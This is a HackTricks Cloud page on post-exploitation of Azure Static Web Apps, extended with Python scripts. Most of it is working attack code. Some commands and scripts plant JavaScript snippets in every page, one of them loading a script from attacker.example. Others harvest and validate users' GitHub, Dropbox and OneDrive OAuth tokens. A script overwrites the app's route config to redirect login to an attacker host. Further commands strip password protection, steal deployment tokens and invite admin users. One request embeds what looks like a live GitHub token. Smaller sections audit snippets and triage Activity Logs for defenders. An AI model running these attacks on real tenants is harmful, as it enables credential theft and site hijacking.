Az - Static Web Apps Post Exploitation
tip
Learn & practice AWS Hacking: HackTricks Training AWS Red Team Expert (ARTE)
Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Learn & practice Azure Hacking: HackTricks Training Azure Red Team Expert (AzRTE)
Support HackTricks
- Check the subscription plans!
- Join the 💬 Discord group or the telegram group or follow us on Twitter 🐦 @hacktricks_live.
- Share hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.
Azure Static Web Apps
For more information about this service check:
Microsoft.Web/staticSites/snippets/write
It's possible to make a static web app load arbitrary HTML by creating a snippet. This allows an attacker to inject JS code into the web application (the snippet is inserted into the body of every page) and steal sensitive information such as credentials or mnemonic keys (in web3 wallets).
The following command creates a snippet that will always be loaded by the web application (the content field is the raw HTML base64-encoded; the example decodes to a script that just calls alert):
az rest \
--method PUT \
--uri "https://management.azure.com/subscriptions/<subscription-id>/resourceGroups/<res-group>/providers/Microsoft.Web/staticSites/<app-name>/snippets/<snippet-name>?api-version=2022-03-01" \
--headers "Content-Type=application/json" \
--body '{
"properties": {
"name": "supersnippet",
"location": "Body",
"applicableEnvironmentsMode": "AllEnvironments",
"content": "PHNjcmlwdD4KYWxlcnQoIkF6dXJlIFNuaXBwZXQiKQo8L3NjcmlwdD4K",
"environments": [],
"insertBottom": false
}
}'
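The same request built programmatically, plus the reverse operation a defender needs (decode every snippet and flag the ones carrying script-capable content). This is an added example, not code from HackTricks or from Azure: the ARM bearer token is assumed to come from the caller (e.g. az account get-access-token), and the list-response shape consumed by audit_snippets() is assumed to be the standard ARM list ({"value": [{"name": ..., "properties": {...}}]}).

```python
"""Plant an HTML/JS snippet in an Azure Static Web App through the ARM API,
and decode existing snippets so a defender can audit them.

Added example, not HackTricks' own code. Follows the request shape of the
az rest command above. Assumptions: the ARM bearer token is supplied by the
caller, and the list response read by audit_snippets() is a standard ARM list.
"""
import base64
import json
import re
import urllib.request

API_VERSION = "2022-03-01"
ARM = "https://management.azure.com"


def snippet_url(subscription_id, resource_group, app_name, snippet_name):
    """Resource URL of one snippet (same URL for PUT, GET and DELETE)."""
    return (f"{ARM}/subscriptions/{subscription_id}/resourceGroups/{resource_group}"
            f"/providers/Microsoft.Web/staticSites/{app_name}/snippets/{snippet_name}"
            f"?api-version={API_VERSION}")


def build_snippet_body(snippet_name, html, insert_bottom=False):
    """PUT body: `content` is the raw HTML base64-encoded, injected into the
    <body> of every environment. insert_bottom=False places it at the top of
    the body, so an injected script runs before the app's own JS."""
    return {"properties": {
        "name": snippet_name,
        "location": "Body",
        "applicableEnvironmentsMode": "AllEnvironments",
        "content": base64.b64encode(html.encode()).decode(),
        "environments": [],
        "insertBottom": insert_bottom,
    }}


def put_snippet(arm_token, url, body):
    """Send the PUT (network call); returns the HTTP status."""
    req = urllib.request.Request(url, data=json.dumps(body).encode(), method="PUT",
                                 headers={"Authorization": f"Bearer {arm_token}",
                                          "Content-Type": "application/json"})
    with urllib.request.urlopen(req, timeout=15) as resp:
        return resp.status


def decode_snippet_content(content_b64):
    """Reverse of build_snippet_body: the HTML that actually gets injected."""
    return base64.b64decode(content_b64).decode(errors="replace")


# Anything that can execute in the victim's browser.
ACTIVE_CONTENT = re.compile(r"<script\b|\bon\w+\s*=|javascript:|<iframe\b", re.I)


def audit_snippets(list_response):
    """Given the JSON of a GET on .../snippets, return {name: decoded_html}
    for every snippet carrying script-capable content."""
    findings = {}
    for item in list_response.get("value", []):
        props = item.get("properties", {})
        html = decode_snippet_content(props.get("content", ""))
        if ACTIVE_CONTENT.search(html):
            findings[item.get("name") or props.get("name")] = html
    return findings


# Constructed sample list response: the page's alert() snippet plus a benign one.
SAMPLE_LIST = {"value": [
    {"name": "supersnippet", "properties": {
        "content": "PHNjcmlwdD4KYWxlcnQoIkF6dXJlIFNuaXBwZXQiKQo8L3NjcmlwdD4K"}},
    {"name": "banner", "properties": {
        "content": base64.b64encode(b"<p>Maintenance window tonight</p>").decode()}},
]}

if __name__ == "__main__":
    # https://attacker.example is a placeholder host.
    body = build_snippet_body("supersnippet",
                              '<script src="https://attacker.example/x.js"></script>')
    print(json.dumps(body, indent=2))
    print(audit_snippets(SAMPLE_LIST))
```

audit_snippets() is the check worth scheduling on the blue-team side: snippets do not show up in the repo, so a code review of the app will never catch them; only the resource itself does.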
Read Configured Third-Party Credentials
As explained in the App Service section:
Running the following command it's possible to read the third-party credentials configured in the current account. Note that these tokens are per user: if for example the Github credentials were configured by a different user, you won't be able to get that user's token from another account.
az rest --method GET \
--url "https://management.azure.com/providers/Microsoft.Web/sourcecontrols?api-version=2024-04-01"
This command returns the tokens for Github, Bitbucket, Dropbox and OneDrive.
Here are example commands to check whether the tokens are still valid:
# GitHub – List Repositories
curl -H "Authorization: token <token>" \
-H "Accept: application/vnd.github.v3+json" \
https://api.github.com/user/repos
# Bitbucket – List Repositories
curl -H "Authorization: Bearer <token>" \
-H "Accept: application/json" \
https://api.bitbucket.org/2.0/repositories
# Dropbox – List Files in Root Folder
curl -X POST https://api.dropboxapi.com/2/files/list_folder \
-H "Authorization: Bearer <token>" \
-H "Content-Type: application/json" \
--data '{"path": ""}'
# OneDrive – List Files in Root Folder
curl -H "Authorization: Bearer <token>" \
-H "Accept: application/json" \
https://graph.microsoft.com/v1.0/me/drive/root/children
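The same triage as a script: parse the sourcecontrols response, keep the providers that actually hold a token and fire the probe requests from the curl examples above. This is an added example, not HackTricks' or Azure's code. The response shape (an ARM list with one Microsoft.Web/sourcecontrols item per provider and the OAuth token in properties.token) is an assumption based on the command above, and SAMPLE_RESPONSE is constructed with fake tokens; only verify() touches the network.

```python
"""Extract third-party OAuth tokens from the GET
/providers/Microsoft.Web/sourcecontrols response and check which still work.

Added example, not HackTricks' own code. Assumption: the response is an ARM
list whose items carry the token in properties.token. SAMPLE_RESPONSE is
constructed with fake tokens. Only verify() makes network calls.
"""
import json
import urllib.error
import urllib.request

# provider -> (probe URL, method, Authorization prefix, body), as in the curl commands above
VERIFY = {
    "GitHub": ("https://api.github.com/user/repos", "GET", "token ", None),
    "Bitbucket": ("https://api.bitbucket.org/2.0/repositories", "GET", "Bearer ", None),
    "Dropbox": ("https://api.dropboxapi.com/2/files/list_folder", "POST", "Bearer ", b'{"path": ""}'),
    "OneDrive": ("https://graph.microsoft.com/v1.0/me/drive/root/children", "GET", "Bearer ", None),
}

SAMPLE_RESPONSE = json.dumps({"value": [
    {"name": "GitHub", "type": "Microsoft.Web/sourcecontrols",
     "properties": {"name": "GitHub", "token": "gho_constructedFakeToken", "tokenSecret": None}},
    {"name": "Bitbucket", "type": "Microsoft.Web/sourcecontrols",
     "properties": {"name": "Bitbucket", "token": None, "tokenSecret": None}},
    {"name": "Dropbox", "type": "Microsoft.Web/sourcecontrols",
     "properties": {"name": "Dropbox", "token": "sl.constructedFakeToken", "tokenSecret": None}},
    {"name": "OneDrive", "type": "Microsoft.Web/sourcecontrols",
     "properties": {"name": "OneDrive", "token": "", "tokenSecret": None}},
]})


def extract_tokens(response_json):
    """{provider: token} for every entry with a non-empty token."""
    tokens = {}
    for item in json.loads(response_json).get("value", []):
        props = item.get("properties", {})
        token = props.get("token")
        if token:
            tokens[props.get("name") or item.get("name")] = token
    return tokens


def build_verify_request(provider, token):
    """The request the curl example for this provider sends."""
    url, method, prefix, body = VERIFY[provider]
    headers = {"Authorization": prefix + token, "Accept": "application/json"}
    if body is not None:
        headers["Content-Type"] = "application/json"
    return urllib.request.Request(url, data=body, method=method, headers=headers)


def verify(provider, token):
    """HTTP status of the probe: 200 means a live token, 401/403 a dead or under-scoped one."""
    try:
        with urllib.request.urlopen(build_verify_request(provider, token), timeout=10) as resp:
            return resp.status
    except urllib.error.HTTPError as err:
        return err.code


def triage(response_json):
    """Probe every token found; returns {provider: status}."""
    return {p: verify(p, t) for p, t in extract_tokens(response_json).items()}


if __name__ == "__main__":
    import subprocess
    raw = subprocess.run(
        ["az", "rest", "--method", "GET", "--url",
         "https://management.azure.com/providers/Microsoft.Web/sourcecontrols?api-version=2024-04-01"],
        capture_output=True, text=True, check=True).stdout
    print(triage(raw))
```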
Overwrite file - Overwrite routes, HTML, JS...
It's possible to overwrite files inside the Github repo hosting the application through Azure using the Github token, by sending a request like the following. It specifies the path of the file to overwrite, the new content (base64-encoded), the commit message and the current blob sha of the file being replaced.
This could be abused by attackers to modify the web app content to serve malicious content (steal credentials, mnemonic keys...) or just to redirect some routes to their own servers by overwriting the staticwebapp.config.json file (the base64 in the example below decodes to a config that rewrites and redirects /profile).
warning
Note that if an attacker manages to compromise the Github repo in any way, they could also overwrite the files directly from Github with the same token.
curl -X PUT "https://functions.azure.com/api/github/updateGitHubContent" \
-H "Content-Type: application/json" \
-d '{
"commit": {
"message": "Update static web app route configuration",
"branchName": "main",
"committer": {
"name": "Azure App Service",
"email": "donotreply@microsoft.com"
},
"contentBase64Encoded": "ewogICJuYXZpZ2F0aW9uRmFsbGJhY2siOiB7CiAgICAicmV3cml0ZSI6ICIvaW5kZXguaHRtbCIKICB9LAogICJyb3V0ZXMiOiBbCiAgICB7CiAgICAgICJyb3V0ZSI6ICIvcHJvZmlsZSIsCiAgICAgICJtZXRob2RzIjogWwogICAgICAgICJnZXQiLAogICAgICAgICJoZWFkIiwKICAgICAgICAicG9zdCIKICAgICAgXSwKICAgICAgInJld3JpdGUiOiAiL3AxIiwKICAgICAgInJlZGlyZWN0IjogIi9sYWxhbGEyIiwKICAgICAgInN0YXR1c0NvZGUiOiAzMDEsCiAgICAgICJhbGxvd2VkUm9sZXMiOiBbCiAgICAgICAgImFub255bW91cyIKICAgICAgXQogICAgfQogIF0KfQ==",
"filePath": "staticwebapp.config.json",
"message": "Update static web app route configuration",
"repoName": "carlospolop/my-first-static-web-app",
"sha": "4b6165d0ad993a5c705e8e9bb23b778dff2f9ca4"
},
"gitHubToken": "gho_1OSsm834ai863yKkdwHGj31927PCFk44BAXL"
}'
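The route-hijack variant end to end, using the GitHub Contents API directly with the stolen token (the shortcut the warning above points out) instead of going through functions.azure.com. This is an added example, not HackTricks' or Azure's code. Assumptions: the token has write access to the repo, main is the deploy branch and https://attacker.example is a placeholder host. PAGE_CONFIG_B64 is the contentBase64Encoded value from the curl command above, decoded here to show what that request deploys; only current_sha() and push_config() touch the network.

```python
"""Overwrite staticwebapp.config.json in the source repo so a chosen route
redirects to an attacker host, via the GitHub Contents API.

Added example, not HackTricks' own code. Assumptions: token has repo write
access, `main` is the deploy branch, https://attacker.example is a
placeholder. PAGE_CONFIG_B64 is the payload from the curl command above.
"""
import base64
import json
import urllib.request

PAGE_CONFIG_B64 = (
    "ewogICJuYXZpZ2F0aW9uRmFsbGJhY2siOiB7CiAgICAicmV3cml0ZSI6ICIvaW5kZXguaHRtbCIKICB9LAog"
    "ICJyb3V0ZXMiOiBbCiAgICB7CiAgICAgICJyb3V0ZSI6ICIvcHJvZmlsZSIsCiAgICAgICJtZXRob2RzIjogWwog"
    "ICAgICAgICJnZXQiLAogICAgICAgICJoZWFkIiwKICAgICAgICAicG9zdCIKICAgICAgXSwKICAgICAgInJld3Jp"
    "dGUiOiAiL3AxIiwKICAgICAgInJlZGlyZWN0IjogIi9sYWxhbGEyIiwKICAgICAgInN0YXR1c0NvZGUiOiAzMDEs"
    "CiAgICAgICJhbGxvd2VkUm9sZXMiOiBbCiAgICAgICAgImFub255bW91cyIKICAgICAgXQogICAgfQogIF0KfQ=="
)

API = "https://api.github.com/repos"


def decode_config(b64):
    """The staticwebapp.config.json a contentBase64Encoded payload deploys."""
    return json.loads(base64.b64decode(b64).decode())


def hijack_config(route, redirect_to, status_code=302, keep_spa_fallback=True):
    """Config with one route that sends every method on `route` to `redirect_to`
    (an absolute URL is accepted) while keeping the SPA fallback so the rest of
    the app keeps working and nothing looks broken."""
    cfg = {"routes": [{
        "route": route,
        "methods": ["get", "head", "post"],
        "redirect": redirect_to,
        "statusCode": status_code,
        "allowedRoles": ["anonymous"],
    }]}
    if keep_spa_fallback:
        cfg["navigationFallback"] = {"rewrite": "/index.html"}
    return cfg


def _headers(token):
    return {"Authorization": f"token {token}", "Accept": "application/vnd.github.v3+json"}


def get_contents_request(token, repo, path, branch="main"):
    return urllib.request.Request(f"{API}/{repo}/contents/{path}?ref={branch}", headers=_headers(token))


def put_contents_request(token, repo, path, content_bytes, sha, branch="main",
                         message="Update static web app route configuration"):
    """PUT /repos/{repo}/contents/{path}; `sha` must be the blob sha currently at that path."""
    body = {"message": message, "branch": branch, "sha": sha,
            "content": base64.b64encode(content_bytes).decode()}
    headers = dict(_headers(token), **{"Content-Type": "application/json"})
    return urllib.request.Request(f"{API}/{repo}/contents/{path}", data=json.dumps(body).encode(),
                                  method="PUT", headers=headers)


def current_sha(token, repo, path, branch="main"):
    """Blob sha of the file (network call); GitHub rejects the PUT without it."""
    with urllib.request.urlopen(get_contents_request(token, repo, path, branch), timeout=15) as resp:
        return json.load(resp)["sha"]


def push_config(token, repo, config, branch="main", path="staticwebapp.config.json"):
    """Commit the config (network call); the SWA workflow then builds and deploys it."""
    sha = current_sha(token, repo, path, branch)
    data = json.dumps(config, indent=2).encode()
    with urllib.request.urlopen(put_contents_request(token, repo, path, data, sha, branch), timeout=15) as resp:
        return resp.status


if __name__ == "__main__":
    print(json.dumps(decode_config(PAGE_CONFIG_B64), indent=2))
    print(json.dumps(hijack_config("/login", "https://attacker.example/login"), indent=2))
```

Commits made this way land on the deploy branch and trigger the normal SWA workflow, so the only trace is a commit whose author is whoever the token belongs to; branch protection on main is what stops this, not anything on the Azure side.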
Microsoft.Web/staticSites/config/write
With this permission it's possible to change the password protecting the static web app, or even remove the password protection from every environment, by sending a request like the following:
# Change password
az rest --method put \
--url "/subscriptions/<subscription-id>/resourceGroups/<res-group>/providers/Microsoft.Web/staticSites/<app-name>/config/basicAuth?api-version=2021-03-01" \
--headers 'Content-Type=application/json' \
--body '{
"name": "basicAuth",
"type": "Microsoft.Web/staticSites/basicAuth",
"properties": {
"password": "SuperPassword123.",
"secretUrl": "",
"applicableEnvironmentsMode": "AllEnvironments"
}
}'
# Remove the need of a password
az rest --method put \
--url "/subscriptions/<subscription-id>/resourceGroups/<res-group>/providers/Microsoft.Web/staticSites/<app-name>/config/basicAuth?api-version=2021-03-01" \
--headers 'Content-Type=application/json' \
--body '{
"name": "basicAuth",
"type": "Microsoft.Web/staticSites/basicAuth",
"properties": {
"secretUrl": "",
"applicableEnvironmentsMode": "SpecifiedEnvironments",
"secretState": "None"
}
}'
Microsoft.Web/staticSites/listSecrets/action
This permission allows getting the API key (deployment token) of the static app:
az rest --method POST \
--url "https://management.azure.com/subscriptions/<subscription-id>/resourceGroups/<res-group>/providers/Microsoft.Web/staticSites/<app-name>/listSecrets?api-version=2023-01-01"
Then, to update the app using the token you can run the following command. Note that this command was found by checking how the Github Action https://github.com/Azure/static-web-apps-deploy works, as it's the one Azure configures by default, so the image and its settings might change in the future.
tip
To deploy the app you can use the swa tool from https://azure.github.io/static-web-apps-cli/docs/cli/swa-deploy#deployment-token or follow these steps:
- Download the repo https://github.com/staticwebdev/react-basic (or any other repo you want to deploy) and run cd react-basic.
- Modify the code you want to deploy.
- Deploy it by running (remember to replace <api-token>):
docker run --rm -v $(pwd):/mnt mcr.microsoft.com/appsvc/staticappsclient:stable INPUT_AZURE_STATIC_WEB_APPS_API_TOKEN=<api-token> INPUT_APP_LOCATION="/mnt" INPUT_API_LOCATION="" INPUT_OUTPUT_LOCATION="build" /bin/staticsites/StaticSitesClient upload --verbose
warning
Even if you have the token, you won't be able to deploy the app if the Deployment Authorization Policy is set to Github. To use the token you'll also need the permission Microsoft.Web/staticSites/write to change the deployment method to use the API token.
Microsoft.Web/staticSites/write
With this permission it's possible to change the source of the static web app to a different Github repository. It won't be deployed automatically, though, as the deployment is done from the Github Action in the repo.
However, if the Deployment Authorization Policy is set to Github, it's possible to deploy the app from the new source repository (the new repo's workflow is the one Azure will now accept).
If the Deployment Authorization Policy isn't set to Github, you can change it with the same Microsoft.Web/staticSites/write permission.
# Change the source to a different Github repository
az staticwebapp update --name my-first-static-web-app --resource-group Resource_Group_1 --source https://github.com/carlospolop/my-first-static-web-app -b main
# Update the deployment method to Github
# <github_token> is the token returned by:
#   az rest --method GET --url "https://management.azure.com/providers/Microsoft.Web/sourcecontrols?api-version=2024-04-01"
az rest --method PATCH \
--url "https://management.azure.com/subscriptions/<subscription-id>/resourceGroups/<res-group>/providers/Microsoft.Web/staticSites/<app-name>?api-version=2022-09-01" \
--headers 'Content-Type=application/json' \
--body '{
"properties": {
"allowConfigFileUpdates": true,
"stagingEnvironmentPolicy": "Enabled",
"buildProperties": {
"appLocation": "/",
"apiLocation": "",
"appArtifactLocation": "build"
},
"deploymentAuthPolicy": "GitHub",
"repositoryToken": "<github_token>"
}
}'
Example Github Action to deploy the app:
name: Azure Static Web Apps CI/CD
on:
  push:
    branches:
      - main
  pull_request:
    types: [opened, synchronize, reopened, closed]
    branches:
      - main
jobs:
  build_and_deploy_job:
    if: github.event_name == 'push' || (github.event_name == 'pull_request' && github.event.action != 'closed')
    runs-on: ubuntu-latest
    name: Build and Deploy Job
    permissions:
      id-token: write
      contents: read
    steps:
      - uses: actions/checkout@v3
        with:
          submodules: true
          lfs: false
      - name: Install OIDC Client from Core Package
        run: npm install @actions/core@1.6.0 @actions/http-client
      - name: Get Id Token
        uses: actions/github-script@v6
        id: idtoken
        with:
          script: |
            const coredemo = require('@actions/core')
            return await coredemo.getIDToken()
          result-encoding: string
      - name: Build And Deploy
        id: builddeploy
        uses: Azure/static-web-apps-deploy@v1
        with:
          azure_static_web_apps_api_token: "12345cbb198a77a092ff885782a62a15d5aef5e3654cac1234509ab54547270704-4140ccee-e04f-424f-b4ca-3d4dd123459c00f0702071d12345" # A valid formatted token is needed although it won't be used for authentication
          action: "upload"
          ###### Repository/Build Configurations - These values can be configured to match your app requirements. ######
          # For more information regarding Static Web App workflow configurations, please visit: https://aka.ms/swaworkflowconfig
          app_location: "/" # App source code path
          api_location: "" # Api source code path - optional
          output_location: "build" # Built app content directory - optional
          github_id_token: ${{ steps.idtoken.outputs.result }}
          ###### End of Repository/Build Configurations ######
  close_pull_request_job:
    if: github.event_name == 'pull_request' && github.event.action == 'closed'
    runs-on: ubuntu-latest
    name: Close Pull Request Job
    steps:
      - name: Close Pull Request
        id: closepullrequest
        uses: Azure/static-web-apps-deploy@v1
        with:
          action: "close"
Microsoft.Web/staticSites/resetapikey/action
With this permission it's possible to reset the API key (deployment token) of the static web app, which causes a DoS for any process that deploys the app automatically with the old token.
az rest --method POST \
--url "https://management.azure.com/subscriptions/<subscription-id>/resourceGroups/<res-group>/providers/Microsoft.Web/staticSites/<app-name>/resetapikey?api-version=2019-08-01"
Microsoft.Web/staticSites/createUserInvitation/action
This permission allows creating an invitation for a user to access the secured routes of the static web app with a specific role.
The login page lives at a path like /.auth/login/github for Github or /.auth/login/aad for Entra ID, and a user can be invited with the following command (the inline comments of the original example broke the line continuations, so they are listed up front here):
# --authentication-provider: one of AAD, Facebook, GitHub, Google, Twitter
# --domain: domain of the app
# --invitation-expiration-in-hours: 168 (7 days) is the max
# --roles: comma separated list of roles
# --user-details: the Github username in this case
az staticwebapp users invite \
--authentication-provider Github \
--domain mango-beach-071d9340f.4.azurestaticapps.net \
--invitation-expiration-in-hours 168 \
--name my-first-static-web-app \
--roles "contributor,administrator" \
--user-details username \
--resource-group Resource_Group_1
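Every permission abused on this page is a control-plane write or action, so it leaves an Azure Activity Log record. The following added example (not HackTricks' or Azure's code) triages such records for the operations covered above; SAMPLE_LOG is constructed in a simplified Activity Log shape (operationName.value, status.value, caller, resourceId, eventTimestamp), and the field access is an assumption to adapt to whatever export format your SIEM ingests. Control-plane reads such as the GET on sourcecontrols are not written to the Activity Log, so that one cannot be caught this way.

```python
"""Triage Azure Activity Log records for the static-site operations abused
on this page. Added example, not HackTricks' own code. SAMPLE_LOG is a
constructed, simplified Activity Log shape; adapt the field names to your
export. Reads (e.g. GET sourcecontrols) are not logged, so not covered.
"""

# Operation names are matched case-insensitively: exports differ in casing.
WATCHED = {
    "microsoft.web/staticsites/snippets/write": "HTML/JS snippet planted in every page",
    "microsoft.web/staticsites/config/write": "basicAuth password changed or removed",
    "microsoft.web/staticsites/listsecrets/action": "deployment token read",
    "microsoft.web/staticsites/write": "source repo / deploymentAuthPolicy / build settings changed",
    "microsoft.web/staticsites/resetapikey/action": "deployment token rotated (breaks CI/CD)",
    "microsoft.web/staticsites/createuserinvitation/action": "user invited to protected routes",
}

SITE = "/subscriptions/0000/resourceGroups/rg/providers/Microsoft.Web/staticSites/my-first-static-web-app"

SAMPLE_LOG = [  # constructed
    {"eventTimestamp": "2024-05-01T10:00:00Z", "caller": "attacker@example.com", "resourceId": SITE,
     "operationName": {"value": "Microsoft.Web/staticSites/snippets/write"}, "status": {"value": "Succeeded"}},
    {"eventTimestamp": "2024-05-01T10:01:00Z", "caller": "ci-deployer@example.com", "resourceId": SITE,
     "operationName": {"value": "MICROSOFT.WEB/STATICSITES/WRITE"}, "status": {"value": "Succeeded"}},
    {"eventTimestamp": "2024-05-01T10:02:00Z", "caller": "attacker@example.com", "resourceId": SITE,
     "operationName": {"value": "Microsoft.Web/staticSites/listSecrets/action"}, "status": {"value": "Failed"}},
    {"eventTimestamp": "2024-05-01T10:03:00Z", "caller": "attacker@example.com", "resourceId": SITE,
     "operationName": {"value": "Microsoft.Web/staticSites/resetapikey/action"}, "status": {"value": "Succeeded"}},
    {"eventTimestamp": "2024-05-01T10:04:00Z", "caller": "reader@example.com", "resourceId": SITE,
     "operationName": {"value": "Microsoft.Web/staticSites/read"}, "status": {"value": "Succeeded"}},
]


def triage(records, allowed_callers=frozenset()):
    """One finding per succeeded watched operation whose caller is not allow-listed.
    Failed attempts are skipped here (they are worth a lower-severity alert of
    their own, since a denied listSecrets is still a permission probe)."""
    findings = []
    for rec in records:
        op = ((rec.get("operationName") or {}).get("value") or "").lower()
        why = WATCHED.get(op)
        if why is None:
            continue
        if (rec.get("status") or {}).get("value") != "Succeeded":
            continue
        if rec.get("caller") in allowed_callers:
            continue
        findings.append({
            "time": rec.get("eventTimestamp"),
            "caller": rec.get("caller"),
            "resource": rec.get("resourceId"),
            "operation": op,
            "why": why,
        })
    return findings


def callers_by_resource(findings):
    """{resourceId: sorted set of callers} to spot one identity touching many sites."""
    out = {}
    for f in findings:
        out.setdefault(f["resource"], set()).add(f["caller"])
    return {k: sorted(v) for k, v in out.items()}


if __name__ == "__main__":
    for f in triage(SAMPLE_LOG, allowed_callers={"ci-deployer@example.com"}):
        print(f"{f['time']} {f['caller']} {f['operation']}: {f['why']}")
```

Microsoft.Web/staticSites/write also fires on every legitimate property change, which is why the example allow-lists the CI principal; the snippets, config, resetapikey and createUserInvitation operations are rare enough in normal operation that they can alert unconditionally.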
Pull Requests
By default, Pull Requests from a branch of the same repo are automatically built and deployed to a staging environment. This could be abused by an attacker with write access to the repo, but without the ability to bypass the branch protection of the production branch (usually main), to deploy a malicious version of the app at the staging URL.
The staging URL has this format: https://<app-subdomain>-<PR-num>.<region>.<rest-of-app-domain>, for example: https://ambitious-plant-0f764e00f-2.eastus2.4.azurestaticapps.net
tip
Note that by default external PRs won't run workflows unless at least 1 PR from that contributor has been merged into the repository. An attacker could send a legitimate PR to the repo first and then send a malicious PR to deploy a malicious app to the staging environment. HOWEVER, there is an unexpected protection: the default Github Action that deploys to the static web app needs access to the secret holding the deployment token (like secrets.AZURE_STATIC_WEB_APPS_API_TOKEN_AMBITIOUS_PLANT_0F764E00F) even when the deployment is performed with the IDToken. Because an external PR doesn't have access to that secret, and an external PR can't modify the workflow to hardcode a dummy token there without the PR being accepted, this attack won't actually work.